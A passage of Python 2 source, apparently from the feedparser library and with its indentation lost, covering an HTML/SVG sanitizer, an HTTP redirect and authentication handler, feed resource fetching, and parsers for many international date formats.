# svgtiny + class + opacity + offset + xmlns + xmlns:xlink
svg_attributes = set(['accent-height', 'accumulate', 'additive', 'alphabetic',
'arabic-form', 'ascent', 'attributeName', 'attributeType',
'baseProfile', 'bbox', 'begin', 'by', 'calcMode', 'cap-height',
'class', 'color', 'color-rendering', 'content', 'cx', 'cy', 'd', 'dx',
'dy', 'descent', 'display', 'dur', 'end', 'fill', 'fill-opacity',
'fill-rule', 'font-family', 'font-size', 'font-stretch', 'font-style',
'font-variant', 'font-weight', 'from', 'fx', 'fy', 'g1', 'g2',
'glyph-name', 'gradientUnits', 'hanging', 'height', 'horiz-adv-x',
'horiz-origin-x', 'id', 'ideographic', 'k', 'keyPoints', 'keySplines',
'keyTimes', 'lang', 'mathematical', 'marker-end', 'marker-mid',
'marker-start', 'markerHeight', 'markerUnits', 'markerWidth', 'max',
'min', 'name', 'offset', 'opacity', 'orient', 'origin',
'overline-position', 'overline-thickness', 'panose-1', 'path',
'pathLength', 'points', 'preserveAspectRatio', 'r', 'refX', 'refY',
'repeatCount', 'repeatDur', 'requiredExtensions', 'requiredFeatures',
'restart', 'rotate', 'rx', 'ry', 'slope', 'stemh', 'stemv',
'stop-color', 'stop-opacity', 'strikethrough-position',
'strikethrough-thickness', 'stroke', 'stroke-dasharray',
'stroke-dashoffset', 'stroke-linecap', 'stroke-linejoin',
'stroke-miterlimit', 'stroke-opacity', 'stroke-width', 'systemLanguage',
'target', 'text-anchor', 'to', 'transform', 'type', 'u1', 'u2',
'underline-position', 'underline-thickness', 'unicode', 'unicode-range',
'units-per-em', 'values', 'version', 'viewBox', 'visibility', 'width',
'widths', 'x', 'x-height', 'x1', 'x2', 'xlink:actuate', 'xlink:arcrole',
'xlink:href', 'xlink:role', 'xlink:show', 'xlink:title', 'xlink:type',
'xml:base', 'xml:lang', 'xml:space', 'xmlns', 'xmlns:xlink', 'y', 'y1',
'y2', 'zoomAndPan'])
svg_attr_map = None
svg_elem_map = None
acceptable_svg_properties = set([ 'fill', 'fill-opacity', 'fill-rule',
'stroke', 'stroke-width', 'stroke-linecap', 'stroke-linejoin',
'stroke-opacity'])
def reset(self):
_BaseHTMLProcessor.reset(self)
self.unacceptablestack = 0
self.mathmlOK = 0
self.svgOK = 0
def unknown_starttag(self, tag, attrs):
acceptable_attributes = self.acceptable_attributes
keymap = {}
if not tag in self.acceptable_elements or self.svgOK:
if tag in self.unacceptable_elements_with_end_tag:
self.unacceptablestack += 1
# add implicit namespaces to html5 inline svg/mathml
if self._type.endswith('html'):
if not dict(attrs).get('xmlns'):
if tag=='svg':
attrs.append( ('xmlns','http://www.w3.org/2000/svg') )
if tag=='math':
attrs.append( ('xmlns','http://www.w3.org/1998/Math/MathML') )
# not otherwise acceptable, perhaps it is MathML or SVG?
if tag=='math' and ('xmlns','http://www.w3.org/1998/Math/MathML') in attrs:
self.mathmlOK += 1
if tag=='svg' and ('xmlns','http://www.w3.org/2000/svg') in attrs:
self.svgOK += 1
# chose acceptable attributes based on tag class, else bail
if self.mathmlOK and tag in self.mathml_elements:
acceptable_attributes = self.mathml_attributes
elif self.svgOK and tag in self.svg_elements:
# for most vocabularies, lowercasing is a good idea. Many
# svg elements, however, are camel case
if not self.svg_attr_map:
lower=[attr.lower() for attr in self.svg_attributes]
mix=[a for a in self.svg_attributes if a not in lower]
self.svg_attributes = lower
self.svg_attr_map = dict([(a.lower(),a) for a in mix])
lower=[attr.lower() for attr in self.svg_elements]
mix=[a for a in self.svg_elements if a not in lower]
self.svg_elements = lower
self.svg_elem_map = dict([(a.lower(),a) for a in mix])
acceptable_attributes = self.svg_attributes
tag = self.svg_elem_map.get(tag,tag)
keymap = self.svg_attr_map
elif not tag in self.acceptable_elements:
return
# declare xlink namespace, if needed
if self.mathmlOK or self.svgOK:
if filter(lambda (n,v): n.startswith('xlink:'),attrs):
if not ('xmlns:xlink','http://www.w3.org/1999/xlink') in attrs:
attrs.append(('xmlns:xlink','http://www.w3.org/1999/xlink'))
clean_attrs = []
for key, value in self.normalize_attrs(attrs):
if key in acceptable_attributes:
key=keymap.get(key,key)
# make sure the uri uses an acceptable uri scheme
if key == u'href':
value = _makeSafeAbsoluteURI(value)
clean_attrs.append((key,value))
elif key=='style':
clean_value = self.sanitize_style(value)
if clean_value:
clean_attrs.append((key,clean_value))
_BaseHTMLProcessor.unknown_starttag(self, tag, clean_attrs)
def unknown_endtag(self, tag):
if not tag in self.acceptable_elements:
if tag in self.unacceptable_elements_with_end_tag:
self.unacceptablestack -= 1
if self.mathmlOK and tag in self.mathml_elements:
if tag == 'math' and self.mathmlOK:
self.mathmlOK -= 1
elif self.svgOK and tag in self.svg_elements:
tag = self.svg_elem_map.get(tag,tag)
if tag == 'svg' and self.svgOK:
self.svgOK -= 1
else:
return
_BaseHTMLProcessor.unknown_endtag(self, tag)
def handle_pi(self, text):
pass
def handle_decl(self, text):
pass
def handle_data(self, text):
if not self.unacceptablestack:
_BaseHTMLProcessor.handle_data(self, text)
def sanitize_style(self, style):
# disallow urls
style=re.compile('url\s*\(\s*[^\s)]+?\s*\)\s*').sub(' ',style)
# gauntlet
if not re.match("""^([:,;#%.\sa-zA-Z0-9!]|\w-\w|'[\s\w]+'|"[\s\w]+"|\([\d,\s]+\))*$""", style):
return ''
# This replaced a regexp that used re.match and was prone to pathological back-tracking.
if re.sub("\s*[-\w]+\s*:\s*[^:;]*;?", '', style).strip():
return ''
clean = []
for prop,value in re.findall("([-\w]+)\s*:\s*([^:;]*)",style):
if not value:
continue
if prop.lower() in self.acceptable_css_properties:
clean.append(prop + ': ' + value + ';')
elif prop.split('-')[0].lower() in ['background','border','margin','padding']:
for keyword in value.split():
if not keyword in self.acceptable_css_keywords and \
not self.valid_css_values.match(keyword):
break
else:
clean.append(prop + ': ' + value + ';')
elif self.svgOK and prop.lower() in self.acceptable_svg_properties:
clean.append(prop + ': ' + value + ';')
return ' '.join(clean)
def parse_comment(self, i, report=1):
ret = _BaseHTMLProcessor.parse_comment(self, i, report)
if ret >= 0:
return ret
# if ret == -1, this may be a malicious attempt to circumvent
# sanitization, or a page-destroying unclosed comment
match = re.compile(r'--[^>]*>').search(self.rawdata, i+4)
if match:
return match.end()
# unclosed comment; deliberately fail to handle_data()
return len(self.rawdata)
def _sanitizeHTML(htmlSource, encoding, _type):
if not _SGML_AVAILABLE:
return htmlSource
p = _HTMLSanitizer(encoding, _type)
htmlSource = htmlSource.replace('<![CDATA[', '<![CDATA[')
p.feed(htmlSource)
data = p.output()
data = data.strip().replace('\r\n', '\n')
return data
class _FeedURLHandler(urllib2.HTTPDigestAuthHandler, urllib2.HTTPRedirectHandler, urllib2.HTTPDefaultErrorHandler):
def http_error_default(self, req, fp, code, msg, headers):
# The default implementation just raises HTTPError.
# Forget that.
fp.status = code
return fp
def http_error_301(self, req, fp, code, msg, hdrs):
result = urllib2.HTTPRedirectHandler.http_error_301(self, req, fp,
code, msg, hdrs)
result.status = code
result.newurl = result.geturl()
return result
# The default implementations in urllib2.HTTPRedirectHandler
# are identical, so hardcoding a http_error_301 call above
# won't affect anything
http_error_300 = http_error_301
http_error_302 = http_error_301
http_error_303 = http_error_301
http_error_307 = http_error_301
def http_error_401(self, req, fp, code, msg, headers):
# Check if
# - server requires digest auth, AND
# - we tried (unsuccessfully) with basic auth, AND
# If all conditions hold, parse authentication information
# out of the Authorization header we sent the first time
# (for the username and password) and the WWW-Authenticate
# header the server sent back (for the realm) and retry
# the request with the appropriate digest auth headers instead.
# This evil genius hack has been brought to you by Aaron Swartz.
host = urlparse.urlparse(req.get_full_url())[1]
if base64 is None or 'Authorization' not in req.headers \
or 'WWW-Authenticate' not in headers:
return self.http_error_default(req, fp, code, msg, headers)
auth = _base64decode(req.headers['Authorization'].split(' ')[1])
user, passw = auth.split(':')
realm = re.findall('realm="([^"]*)"', headers['WWW-Authenticate'])[0]
self.add_password(realm, host, user, passw)
retry = self.http_error_auth_reqed('www-authenticate', host, req, headers)
self.reset_retry_count()
return retry
def _open_resource(url_file_stream_or_string, etag, modified, agent, referrer, handlers, request_headers):
"""URL, filename, or string --> stream
This function lets you define parsers that take any input source
(URL, pathname to local or network file, or actual data as a string)
and deal with it in a uniform manner. Returned object is guaranteed
to have all the basic stdio read methods (read, readline, readlines).
Just .close() the object when you're done with it.
If the etag argument is supplied, it will be used as the value of an
If-None-Match request header.
If the modified argument is supplied, it can be a tuple of 9 integers
(as returned by gmtime() in the standard Python time module) or a date
string in any format supported by feedparser. Regardless, it MUST
be in GMT (Greenwich Mean Time). It will be reformatted into an
RFC 1123-compliant date and used as the value of an If-Modified-Since
request header.
If the agent argument is supplied, it will be used as the value of a
User-Agent request header.
If the referrer argument is supplied, it will be used as the value of a
Referer[sic] request header.
If handlers is supplied, it is a list of handlers used to build a
urllib2 opener.
if request_headers is supplied it is a dictionary of HTTP request headers
that will override the values generated by FeedParser.
"""
if hasattr(url_file_stream_or_string, 'read'):
return url_file_stream_or_string
if isinstance(url_file_stream_or_string, basestring) \
and urlparse.urlparse(url_file_stream_or_string)[0] in ('http', 'https', 'ftp', 'file', 'feed'):
# Deal with the feed URI scheme
if url_file_stream_or_string.startswith('feed:http'):
url_file_stream_or_string = url_file_stream_or_string[5:]
elif url_file_stream_or_string.startswith('feed:'):
url_file_stream_or_string = 'http:' + url_file_stream_or_string[5:]
if not agent:
agent = USER_AGENT
# Test for inline user:password credentials for HTTP basic auth
auth = None
if base64 and not url_file_stream_or_string.startswith('ftp:'):
urltype, rest = urllib.splittype(url_file_stream_or_string)
realhost, rest = urllib.splithost(rest)
if realhost:
user_passwd, realhost = urllib.splituser(realhost)
if user_passwd:
url_file_stream_or_string = '%s://%s%s' % (urltype, realhost, rest)
auth = base64.standard_b64encode(user_passwd).strip()
# iri support
if isinstance(url_file_stream_or_string, unicode):
url_file_stream_or_string = _convert_to_idn(url_file_stream_or_string)
# try to open with urllib2 (to use optional headers)
request = _build_urllib2_request(url_file_stream_or_string, agent, etag, modified, referrer, auth, request_headers)
opener = urllib2.build_opener(*tuple(handlers + [_FeedURLHandler()]))
opener.addheaders = [] # RMK - must clear so we only send our custom User-Agent
try:
return opener.open(request)
finally:
opener.close() # JohnD
# try to open with native open function (if url_file_stream_or_string is a filename)
try:
return open(url_file_stream_or_string, 'rb')
except (IOError, UnicodeEncodeError, TypeError):
# if url_file_stream_or_string is a unicode object that
# cannot be converted to the encoding returned by
# sys.getfilesystemencoding(), a UnicodeEncodeError
# will be thrown
# If url_file_stream_or_string is a string that contains NULL
# (such as an XML document encoded in UTF-32), TypeError will
# be thrown.
pass
# treat url_file_stream_or_string as string
if isinstance(url_file_stream_or_string, unicode):
return _StringIO(url_file_stream_or_string.encode('utf-8'))
return _StringIO(url_file_stream_or_string)
def _convert_to_idn(url):
"""Convert a URL to IDN notation"""
# this function should only be called with a unicode string
# strategy: if the host cannot be encoded in ascii, then
# it'll be necessary to encode it in idn form
parts = list(urlparse.urlsplit(url))
try:
parts[1].encode('ascii')
except UnicodeEncodeError:
# the url needs to be converted to idn notation
host = parts[1].rsplit(':', 1)
newhost = []
port = u''
if len(host) == 2:
port = host.pop()
for h in host[0].split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
if port:
parts[1] += ':' + port
return urlparse.urlunsplit(parts)
else:
return url
def _build_urllib2_request(url, agent, etag, modified, referrer, auth, request_headers):
request = urllib2.Request(url)
request.add_header('User-Agent', agent)
if etag:
request.add_header('If-None-Match', etag)
if isinstance(modified, basestring):
modified = _parse_date(modified)
elif isinstance(modified, datetime.datetime):
modified = modified.utctimetuple()
if modified:
# format into an RFC 1123-compliant timestamp. We can't use
# time.strftime() since the %a and %b directives can be affected
# by the current locale, but RFC 2616 states that dates must be
# in English.
short_weekdays = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
request.add_header('If-Modified-Since', '%s, %02d %s %04d %02d:%02d:%02d GMT' % (short_weekdays[modified[6]], modified[2], months[modified[1] - 1], modified[0], modified[3], modified[4], modified[5]))
if referrer:
request.add_header('Referer', referrer)
if gzip and zlib:
request.add_header('Accept-encoding', 'gzip, deflate')
elif gzip:
request.add_header('Accept-encoding', 'gzip')
elif zlib:
request.add_header('Accept-encoding', 'deflate')
else:
request.add_header('Accept-encoding', '')
if auth:
request.add_header('Authorization', 'Basic %s' % auth)
if ACCEPT_HEADER:
request.add_header('Accept', ACCEPT_HEADER)
# use this for whatever -- cookies, special headers, etc
# [('Cookie','Something'),('x-special-header','Another Value')]
for header_name, header_value in request_headers.items():
request.add_header(header_name, header_value)
request.add_header('A-IM', 'feed') # RFC 3229 support
return request
def _parse_psc_chapter_start(start):
FORMAT = r'^((\d{2}):)?(\d{2}):(\d{2})(\.(\d{3}))?$'
m = re.compile(FORMAT).match(start)
if m is None:
return None
_, h, m, s, _, ms = m.groups()
h, m, s, ms = (int(h or 0), int(m), int(s), int(ms or 0))
return datetime.timedelta(0, h*60*60 + m*60 + s, ms*1000)
_date_handlers = []
def registerDateHandler(func):
'''Register a date handler function (takes string, returns 9-tuple date in GMT)'''
_date_handlers.insert(0, func)
# ISO-8601 date parsing routines written by Fazal Majid.
# The ISO 8601 standard is very convoluted and irregular - a full ISO 8601
# parser is beyond the scope of feedparser and would be a worthwhile addition
# to the Python library.
# A single regular expression cannot parse ISO 8601 date formats into groups
# as the standard is highly irregular (for instance is 030104 2003-01-04 or
# 0301-04-01), so we use templates instead.
# Please note the order in templates is significant because we need a
# greedy match.
_iso8601_tmpl = ['YYYY-?MM-?DD', 'YYYY-0MM?-?DD', 'YYYY-MM', 'YYYY-?OOO',
'YY-?MM-?DD', 'YY-?OOO', 'YYYY',
'-YY-?MM', '-OOO', '-YY',
'--MM-?DD', '--MM',
'---DD',
'CC', '']
_iso8601_re = [
tmpl.replace(
'YYYY', r'(?P<year>\d{4})').replace(
'YY', r'(?P<year>\d\d)').replace(
'MM', r'(?P<month>[01]\d)').replace(
'DD', r'(?P<day>[0123]\d)').replace(
'OOO', r'(?P<ordinal>[0123]\d\d)').replace(
'CC', r'(?P<century>\d\d$)')
+ r'(T?(?P<hour>\d{2}):(?P<minute>\d{2})'
+ r'(:(?P<second>\d{2}))?'
+ r'(\.(?P<fracsecond>\d+))?'
+ r'(?P<tz>[+-](?P<tzhour>\d{2})(:(?P<tzmin>\d{2}))?|Z)?)?'
for tmpl in _iso8601_tmpl]
try:
del tmpl
except NameError:
pass
_iso8601_matches = [re.compile(regex).match for regex in _iso8601_re]
try:
del regex
except NameError:
pass
def _parse_date_iso8601(dateString):
'''Parse a variety of ISO-8601-compatible formats like 20040105'''
m = None
for _iso8601_match in _iso8601_matches:
m = _iso8601_match(dateString)
if m:
break
if not m:
return
if m.span() == (0, 0):
return
params = m.groupdict()
ordinal = params.get('ordinal', 0)
if ordinal:
ordinal = int(ordinal)
else:
ordinal = 0
year = params.get('year', '--')
if not year or year == '--':
year = time.gmtime()[0]
elif len(year) == 2:
# ISO 8601 assumes current century, i.e. 93 -> 2093, NOT 1993
year = 100 * int(time.gmtime()[0] / 100) + int(year)
else:
year = int(year)
month = params.get('month', '-')
if not month or month == '-':
# ordinals are NOT normalized by mktime, we simulate them
# by setting month=1, day=ordinal
if ordinal:
month = 1
else:
month = time.gmtime()[1]
month = int(month)
day = params.get('day', 0)
if not day:
# see above
if ordinal:
day = ordinal
elif params.get('century', 0) or \
params.get('year', 0) or params.get('month', 0):
day = 1
else:
day = time.gmtime()[2]
else:
day = int(day)
# special case of the century - is the first year of the 21st century
# 2000 or 2001 ? The debate goes on...
if 'century' in params:
year = (int(params['century']) - 1) * 100 + 1
# in ISO 8601 most fields are optional
for field in ['hour', 'minute', 'second', 'tzhour', 'tzmin']:
if not params.get(field, None):
params[field] = 0
hour = int(params.get('hour', 0))
minute = int(params.get('minute', 0))
second = int(float(params.get('second', 0)))
# weekday is normalized by mktime(), we can ignore it
weekday = 0
daylight_savings_flag = -1
tm = [year, month, day, hour, minute, second, weekday,
ordinal, daylight_savings_flag]
# ISO 8601 time zone adjustments
tz = params.get('tz')
if tz and tz != 'Z':
if tz[0] == '-':
tm[3] += int(params.get('tzhour', 0))
tm[4] += int(params.get('tzmin', 0))
elif tz[0] == '+':
tm[3] -= int(params.get('tzhour', 0))
tm[4] -= int(params.get('tzmin', 0))
else:
return None
# Python's time.mktime() is a wrapper around the ANSI C mktime(3c)
# which is guaranteed to normalize d/m/y/h/m/s.
# Many implementations have bugs, but we'll pretend they don't.
return time.localtime(time.mktime(tuple(tm)))
registerDateHandler(_parse_date_iso8601)
# 8-bit date handling routines written by ytrewq1.
_korean_year = u'\ub144' # b3e2 in euc-kr
_korean_month = u'\uc6d4' # bff9 in euc-kr
_korean_day = u'\uc77c' # c0cf in euc-kr
_korean_am = u'\uc624\uc804' # bfc0 c0fc in euc-kr
_korean_pm = u'\uc624\ud6c4' # bfc0 c8c4 in euc-kr
_korean_onblog_date_re = \
re.compile('(\d{4})%s\s+(\d{2})%s\s+(\d{2})%s\s+(\d{2}):(\d{2}):(\d{2})' % \
(_korean_year, _korean_month, _korean_day))
_korean_nate_date_re = \
re.compile(u'(\d{4})-(\d{2})-(\d{2})\s+(%s|%s)\s+(\d{,2}):(\d{,2}):(\d{,2})' % \
(_korean_am, _korean_pm))
def _parse_date_onblog(dateString):
'''Parse a string according to the OnBlog 8-bit date format'''
m = _korean_onblog_date_re.match(dateString)
if not m:
return
w3dtfdate = '%(year)s-%(month)s-%(day)sT%(hour)s:%(minute)s:%(second)s%(zonediff)s' % \
{'year': m.group(1), 'month': m.group(2), 'day': m.group(3),\
'hour': m.group(4), 'minute': m.group(5), 'second': m.group(6),\
'zonediff': '+09:00'}
return _parse_date_w3dtf(w3dtfdate)
registerDateHandler(_parse_date_onblog)
def _parse_date_nate(dateString):
'''Parse a string according to the Nate 8-bit date format'''
m = _korean_nate_date_re.match(dateString)
if not m:
return
hour = int(m.group(5))
ampm = m.group(4)
if (ampm == _korean_pm):
hour += 12
hour = str(hour)
if len(hour) == 1:
hour = '0' + hour
w3dtfdate = '%(year)s-%(month)s-%(day)sT%(hour)s:%(minute)s:%(second)s%(zonediff)s' % \
{'year': m.group(1), 'month': m.group(2), 'day': m.group(3),\
'hour': hour, 'minute': m.group(6), 'second': m.group(7),\
'zonediff': '+09:00'}
return _parse_date_w3dtf(w3dtfdate)
registerDateHandler(_parse_date_nate)
# Unicode strings for Greek date strings
_greek_months = \
{ \
u'\u0399\u03b1\u03bd': u'Jan', # c9e1ed in iso-8859-7
u'\u03a6\u03b5\u03b2': u'Feb', # d6e5e2 in iso-8859-7
u'\u039c\u03ac\u03ce': u'Mar', # ccdcfe in iso-8859-7
u'\u039c\u03b1\u03ce': u'Mar', # cce1fe in iso-8859-7
u'\u0391\u03c0\u03c1': u'Apr', # c1f0f1 in iso-8859-7
u'\u039c\u03ac\u03b9': u'May', # ccdce9 in iso-8859-7
u'\u039c\u03b1\u03ca': u'May', # cce1fa in iso-8859-7
u'\u039c\u03b1\u03b9': u'May', # cce1e9 in iso-8859-7
u'\u0399\u03bf\u03cd\u03bd': u'Jun', # c9effded in iso-8859-7
u'\u0399\u03bf\u03bd': u'Jun', # c9efed in iso-8859-7
u'\u0399\u03bf\u03cd\u03bb': u'Jul', # c9effdeb in iso-8859-7
u'\u0399\u03bf\u03bb': u'Jul', # c9f9eb in iso-8859-7
u'\u0391\u03cd\u03b3': u'Aug', # c1fde3 in iso-8859-7
u'\u0391\u03c5\u03b3': u'Aug', # c1f5e3 in iso-8859-7
u'\u03a3\u03b5\u03c0': u'Sep', # d3e5f0 in iso-8859-7
u'\u039f\u03ba\u03c4': u'Oct', # cfeaf4 in iso-8859-7
u'\u039d\u03bf\u03ad': u'Nov', # cdefdd in iso-8859-7
u'\u039d\u03bf\u03b5': u'Nov', # cdefe5 in iso-8859-7
u'\u0394\u03b5\u03ba': u'Dec', # c4e5ea in iso-8859-7
}
_greek_wdays = \
{ \
u'\u039a\u03c5\u03c1': u'Sun', # caf5f1 in iso-8859-7
u'\u0394\u03b5\u03c5': u'Mon', # c4e5f5 in iso-8859-7
u'\u03a4\u03c1\u03b9': u'Tue', # d4f1e9 in iso-8859-7
u'\u03a4\u03b5\u03c4': u'Wed', # d4e5f4 in iso-8859-7
u'\u03a0\u03b5\u03bc': u'Thu', # d0e5ec in iso-8859-7
u'\u03a0\u03b1\u03c1': u'Fri', # d0e1f1 in iso-8859-7
u'\u03a3\u03b1\u03b2': u'Sat', # d3e1e2 in iso-8859-7
}
_greek_date_format_re = \
re.compile(u'([^,]+),\s+(\d{2})\s+([^\s]+)\s+(\d{4})\s+(\d{2}):(\d{2}):(\d{2})\s+([^\s]+)')
def _parse_date_greek(dateString):
'''Parse a string according to a Greek 8-bit date format.'''
m = _greek_date_format_re.match(dateString)
if not m:
return
wday = _greek_wdays[m.group(1)]
month = _greek_months[m.group(3)]
rfc822date = '%(wday)s, %(day)s %(month)s %(year)s %(hour)s:%(minute)s:%(second)s %(zonediff)s' % \
{'wday': wday, 'day': m.group(2), 'month': month, 'year': m.group(4),\
'hour': m.group(5), 'minute': m.group(6), 'second': m.group(7),\
'zonediff': m.group(8)}
return _parse_date_rfc822(rfc822date)
registerDateHandler(_parse_date_greek)
# Unicode strings for Hungarian date strings
_hungarian_months = \
{ \
u'janu\u00e1r': u'01', # e1 in iso-8859-2
u'febru\u00e1ri': u'02', # e1 in iso-8859-2
u'm\u00e1rcius': u'03', # e1 in iso-8859-2
u'\u00e1prilis': u'04', # e1 in iso-8859-2
u'm\u00e1ujus': u'05', # e1 in iso-8859-2
u'j\u00fanius': u'06', # fa in iso-8859-2
u'j\u00falius': u'07', # fa in iso-8859-2
u'augusztus': u'08',
u'szeptember': u'09',
u'okt\u00f3ber': u'10', # f3 in iso-8859-2
u'november': u'11',
u'december': u'12',
}
_hungarian_date_format_re = \
re.compile(u'(\d{4})-([^-]+)-(\d{,2})T(\d{,2}):(\d{2})((\+|-)(\d{,2}:\d{2}))')
def _parse_date_hungarian(dateString):
'''Parse a string according to a Hungarian 8-bit date format.'''
m = _hungarian_date_format_re.match(dateString)
if not m or m.group(2) not in _hungarian_months:
return None
month = _hungarian_months[m.group(2)]
day = m.group(3)
if len(day) == 1:
day = '0' + day
hour = m.group(4)
if len(hour) == 1:
hour = '0' + hour
w3dtfdate = '%(year)s-%(month)s-%(day)sT%(hour)s:%(minute)s%(zonediff)s' % \
{'year': m.group(1), 'month': month, 'day': day,\
'hour': hour, 'minute': m.group(5),\
'zonediff': m.group(6)}
return _parse_date_w3dtf(w3dtfdate)
registerDateHandler(_parse_date_hungarian)
timezonenames = {
'ut': 0, 'gmt': 0, 'z': 0,
'adt': -3, 'ast': -4, 'at': -4,
'edt': -4, 'est': -5, 'et': -5,
'cdt': -5, 'cst': -6, 'ct': -6,
'mdt': -6, 'mst': -7, 'mt': -7,
'pdt': -7, 'pst': -8, 'pt': -8,
'a': -1, 'n': 1,
'm': -12, 'y': 12,
}
# W3 date and time format parser
# http://www.w3.org/TR/NOTE-datetime
# Also supports MSSQL-style datetimes as defined at:
# http://msdn.microsoft.com/en-us/library/ms186724.aspx
# (basically, allow a space as a date/time/timezone separator)
def _parse_date_w3dtf(datestr):
if not datestr.strip():
return None
parts = datestr.lower().split('t')
if len(parts) == 1:
# This may be a date only, or may be an MSSQL-style date
parts = parts[0].split()
if len(parts) == 1:
# Treat this as a date only
parts.append('00:00:00z')
elif len(parts) > 2:
return None
date = parts[0].split('-', 2)
if not date or len(date[0]) != 4:
return None
# Ensure that `date` has 3 elements. Using '1' sets the default
# month to January and the default day to the 1st of the month.
date.extend(['1'] * (3 - len(date)))
try:
year, month, day = [int(i) for i in date]
except ValueError:
# `date` may have more than 3 elements or may contain
# non-integer strings.
return None
if parts[1].endswith('z'):
parts[1] = parts[1][:-1]
parts.append('z')
# Append the numeric timezone offset, if any, to parts.
# If this is an MSSQL-style date then parts[2] already contains
# the timezone information, so `append()` will not affect it.
# Add 1 to each value so that if `find()` returns -1 it will be
# treated as False.
loc = parts[1].find('-') + 1 or parts[1].find('+') + 1 or len(parts[1]) + 1
loc = loc - 1
parts.append(parts[1][loc:])
parts[1] = parts[1][:loc]
time = parts[1].split(':', 2)
# Ensure that time has 3 elements. Using '0' means that the
# minutes and seconds, if missing, will default to 0.
time.extend(['0'] * (3 - len(time)))
tzhour = 0
tzmin = 0
if parts[2][:1] in ('-', '+'):
try:
tzhour = int(parts[2][1:3])
tzmin = int(parts[2][4:])
except ValueError:
return None
if parts[2].startswith('-'):
tzhour = tzhour * -1
tzmin = tzmin * -1
else:
tzhour = timezonenames.get(parts[2], 0)
try:
hour, minute, second = [int(float(i)) for i in time]
except ValueError:
return None
# Create the datetime object and timezone delta objects
try:
stamp = datetime.datetime(year, month, day, hour, minute, second)
except ValueError:
return None
delta = datetime.timedelta(0, 0, 0, 0, tzmin, tzhour)
# Return the date and timestamp in a UTC 9-tuple
try:
return (stamp - delta).utctimetuple()
except (OverflowError, ValueError):
# IronPython throws ValueErrors instead of OverflowErrors
return None
registerDateHandler(_parse_date_w3dtf)
def _parse_date_rfc822(date):
"""Parse RFC 822 dates and times
http://tools.ietf.org/html/rfc822#section-5
There are some formatting differences that are accounted for:
1. Years may be two or four digits.
2. The month and day can be swapped.
3. Additional timezone names are supported.
4. A default time and timezone are assumed if only a date is present.
"""
daynames = set(['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun'])
months = {
'jan': 1, 'feb': 2, 'mar': 3, 'apr': 4, 'may': 5, 'jun': 6,
'jul': 7, 'aug': 8, 'sep': 9, 'oct': 10, 'nov': 11, 'dec': 12,
}
parts = date.lower().split()
if len(parts) < 5:
# Assume that the time and timezone are missing
parts.extend(('00:00:00', '0000'))
# Remove the day name
if parts[0][:3] in daynames:
parts = parts[1:]
if len(parts) < 5:
# If there are still fewer than five parts, there's not enough
# information to interpret this
return None
try:
day = int(parts[0])
except ValueError:
# Check if the day and month are swapped
if months.get(parts[0][:3]):
try:
day = int(parts[1])
except ValueError:
return None
else:
parts[1] = parts[0]
else:
return None
month = months.get(parts[1][:3])
if not month:
return None
try:
year = int(parts[2])
except ValueError:
return None
# Normalize two-digit years:
# Anything in the 90's is interpreted as 1990 and on
# Anything 89 or less is interpreted as 2089 or before
if len(parts[2]) <= 2:
year += (1900, 2000)[year < 90]
timeparts = parts[3].split(':')
timeparts = timeparts + ([0] * (3 - len(timeparts)))
try:
(hour, minute, second) = map(int, timeparts)
except ValueError:
return None
tzhour = 0
tzmin = 0
# Strip 'Etc/' from the timezone
if parts[4].startswith('etc/'):
parts[4] = parts[4][4:]
# Normalize timezones that start with 'gmt':
# GMT-05:00 => -0500
# GMT => GMT
if parts[4].startswith('gmt'):
parts[4] = ''.join(parts[4][3:].split(':')) or 'gmt'
# Handle timezones like '-0500', '+0500', and 'EST'
if parts[4] and parts[4][0] in ('-', '+'):
try:
tzhour = int(parts[4][1:3])
tzmin = int(parts[4][3:])
except ValueError:
return None
if parts[4].startswith('-'):
tzhour = tzhour * -1
tzmin = tzmin * -1
else:
tzhour = timezonenames.get(parts[4], 0)
# Create the datetime object and timezone delta objects
try:
stamp = datetime.datetime(year, month, day, hour, minute, second)
except ValueError:
return None
delta = datetime.timedelta(0, 0, 0, 0, tzmin, tzhour)
# Return the date and timestamp in a UTC 9-tuple
try:
return (stamp - delta).utctimetuple()
except (OverflowError, ValueError):
# IronPython throws ValueErrors instead of OverflowErrors
return None
registerDateHandler(_parse_date_rfc822)
_months = ['jan', 'feb', 'mar', 'apr', 'may', 'jun',
'jul', 'aug', 'sep', 'oct', 'nov', 'dec']
def _parse_date_asctime(dt):
"""Parse asctime-style dates"""
dayname, month, day, remainder = dt.split(None, 3)
# Convert month and day into zero-padded integers
month = '%02i ' % (_months.index(month.lower()) + 1)
day = '%02i ' % (int(day),)
dt = month + day + remainder
return time.strptime(dt, '%m %d %H:%M:%S %Y')[:-1] + (0, )
registerDateHandler(_parse_date_asctime)
def _parse_date_perforce(aDateString):
"""parse a date in yyyy/mm/dd hh:mm:ss TTT format"""
# Fri, 2006/09/15 08:19:53 EDT
_my_date_pattern = re.compile( \
r'(\w{,3}), (\d{,4})/(\d{,2})/(\d{2}) (\d{,2}):(\d{2}):(\d{2}) (\w{,3})')
m = _my_date_pattern.search(aDateString)
if m is None:
return None
dow, year, month, day, hour, minute, second, tz = m.groups()
months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
dateString = "%s, %s %s %s %s:%s:%s %s" % (dow, day, months[int(month) - 1], year, hour, minute, second, tz)
tm = rfc822.parsedate_tz(dateString)
if tm:
return time.gmtime(rfc822.mktime_tz(tm))
registerDateHandler(_parse_date_perforce)
def _parse_date(dateString):
'''Parses a variety of date formats into a 9-tuple in GMT'''
if not dateString:
return None
for handler in _date_handlers:
try:
date9tuple = handler(dateString)
except (KeyError, OverflowError, ValueError):
continue
if not date9tuple:
continue
if len(date9tuple) != 9:
continue
return date9tuple
return None
# Each marker represents some of the characters of the opening XML
# processing instruction ('<?xm') in the specified encoding.
EBCDIC_MARKER = _l2bytes([0x4C, 0x6F, 0xA7, 0x94])
UTF16BE_MARKER = _l2bytes([0x00, 0x3C, 0x00, 0x3F])
UTF16LE_MARKER = _l2bytes([0x3C, 0x00, 0x3F, 0x00])
UTF32BE_MARKER = _l2bytes([0x00, 0x00, 0x00, 0x3C])
UTF32LE_MARKER = _l2bytes([0x3C, 0x00, 0x00, 0x00])
